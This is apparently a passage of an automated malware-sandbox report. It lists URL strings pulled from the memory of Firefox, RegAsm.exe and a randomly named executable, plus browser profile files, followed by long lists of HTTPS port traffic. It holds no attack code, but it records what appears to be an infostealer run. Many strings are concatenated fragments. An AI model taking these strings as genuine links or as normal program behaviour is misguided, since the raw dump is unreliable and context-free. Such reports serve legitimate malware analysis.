Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/light_mode/face_meh.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/light_mode/face_sad.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/light_mode/face_unhappy.json
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/light_mode/face_very_happy.json
Source: firefox.exe, 00000033.00000003.2994582235.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992520338.0000026F5DD3B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/youtube/img/useredu/smart_downloads_optin_banner.gif
Source: chromecache_943.22.dr	String found in binary or memory: https://www.internalfb.com/intern/invariant/
Source: RegAsm.exe	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.mozilla.org
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.mozilla.org#
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: favicons.sqlite-wal.51.dr	String found in binary or memory: https://www.mozilla.org/about/
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: firefox.exe, 00000033.00000003.2947953057.0000026F5AD1F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: favicons.sqlite-wal.51.dr	String found in binary or memory: https://www.mozilla.org/contribute/
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: favicons.sqlite-wal.51.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000033.00000003.2692899438.0000026F49D5D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000031.00000002.4771651637.0000020344E90000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000033.00000003.2632468216.0000026F52556000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2677633982.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, D0F48A0632B6C451791F4257697E861961F06A6F.51.dr	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000033.00000003.2795566806.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2675923428.0000026F4C799000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2977225357.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2688000475.0000026F49DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2677633982.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2642685463.0000026F4BC38000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: AF10D6A6EDDDEAF586DD225969745155C8322254.51.dr, 1247451676yCt7-%pCl7a%y3efrd-9l.sqlite.51.dr	String found in binary or memory: https://www.youtube.com
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com$
Source: firefox.exe, 00000032.00000002.2594126672.00000274DAAD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com--attempting-deelevation
Source: D0F48A0632B6C451791F4257697E861961F06A6F.51.dr, 629A321F0AC373A586B46A52889FEF90A2570B88.51.dr, 69455E9F6ABEDFC78866EDEA94CB9D51C573A013.51.dr, E4F97C21330F66B9CA5E2F70F052E141CB217EC8.51.dr, favicons.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com/
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/.j
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com/YouTubemoc.ebutuoy.www.
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/aboutthisad?pf=web&source=youtube&reasons=A
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/api/stats/ads?ver=
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/api/timedtext?v=
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/embed/
Source: Web Data.36.dr	String found in binary or memory: https://www.youtube.com/favicon.icohttps://www.youtube.com/results?search_query=
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/get_midroll_info?ei=
Source: firefox.exe, 00000033.00000003.2995384412.0000026F5DBB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/get_midroll_info?ei=l3FgBarVGsIphxLPxuRduBc&m_pos=330&token=RLJjkrMhTDF1XyVx
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com/img/desktop/yt_1200.png
Source: places.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com/moc.ebutuoy.www.
Source: 69455E9F6ABEDFC78866EDEA94CB9D51C573A013.51.dr	String found in binary or memory: https://www.youtube.com/necko:classified1
Source: Web Data.36.dr	String found in binary or memory: https://www.youtube.com/opensearch?locale=en_GB
Source: Web Data.36.dr	String found in binary or memory: https://www.youtube.com/opensearch?locale=en_GB/m
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/pagead/adview?ai=C
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/pagead/int
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/pagead/interaction
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/pagead/interaction/?ai=C
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/pcs/activeview?xai=
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ptracking?ei=
Source: firefox.exe, 00000033.00000003.2994770537.0000026F5DBE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.NAGOkLXK6QY.L.F4.O/am=ABAK/
Source: 33200725926A095B3A48EB9ABD6821C7F895DF65.51.dr	String found in binary or memory: https://www.youtube.com/s/desktop/80338919/cssbin/www-main-desktop-home-page-skeleton.css
Source: favicons.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com/s/desktop/80338919/img/favicon.ico
Source: 48D71C745420E717A699F4CC6847C17B6C743A51.51.dr, favicons.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com/s/desktop/80338919/img/favicon_144x144.png
Source: 281D3362FC8DAA6BD8595A1C942DD405542AD365.51.dr	String found in binary or memory: https://www.youtube.com/s/desktop/80338919/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.
Source: 70DE259D3055F51A1BEBD035A0E461EC8E9213A5.51.dr	String found in binary or memory: https://www.youtube.com/s/desktop/80338919/jsbin/www-tampering.vflset/www-tampering.js
Source: 3D2EE65213655611AE063776EA786EF2A8F7901B.51.dr	String found in binary or memory: https://www.youtube.com/s/search/audio/failure.mp3
Source: chromecache_973.22.dr	String found in binary or memory: https://www.youtube.com/t/terms?chromeless=1&hl=
Source: 629A321F0AC373A586B46A52889FEF90A2570B88.51.dr	String found in binary or memory: https://www.youtube.com/youtubei/v1/feedback?key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8&prettyPrint
Source: E4F97C21330F66B9CA5E2F70F052E141CB217EC8.51.dr	String found in binary or memory: https://www.youtube.com/youtubei/v1/guide?key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8&prettyPrint=fa
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993057754.0000026F5DBA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/youtubei/v1/player?key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8&prettyPrint=f
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/~k
Source: firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com0
Source: firefox.exe, 00000026.00000002.2494708399.000002014BF00000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.comC:
Source: firefox.exe, 00000034.00000002.2672529573.000002650EEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.comMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:
Source: firefox.exe, 00000034.00000002.2672529573.000002650EEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.comNUMBER_OF_PROCESSORS=2OneDrive=C:
Source: firefox.exe, 00000026.00000002.2494708399.000002014BF09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.comT
Source: firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.coml
Source: firefox.exe, 00000034.00000002.2671229522.000002650D090000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.comy
Source: firefox.exe, 00000031.00000002.4753403845.0000020344896000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632135362.0000026F525DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2632290478.0000026F525C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000031.00000002.4775596956.00000203450A0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000033.00000003.2993278709.0000026F5DDD3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2992190171.0000026F5DDBB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993278709.0000026F5DDC3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995629438.0000026F5DB8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: chromecache_973.22.dr	String found in binary or memory: https://youtube.com/t/terms?gl=
Source: permissions.sqlite.51.dr	String found in binary or memory: https://youtube.comhighValueCOOP
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yt3.ggpht.com/
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://yt3.ggpht.com/ytc/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 50277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50217
Source: unknown	Network traffic detected: HTTP traffic on port 50174 -> 443
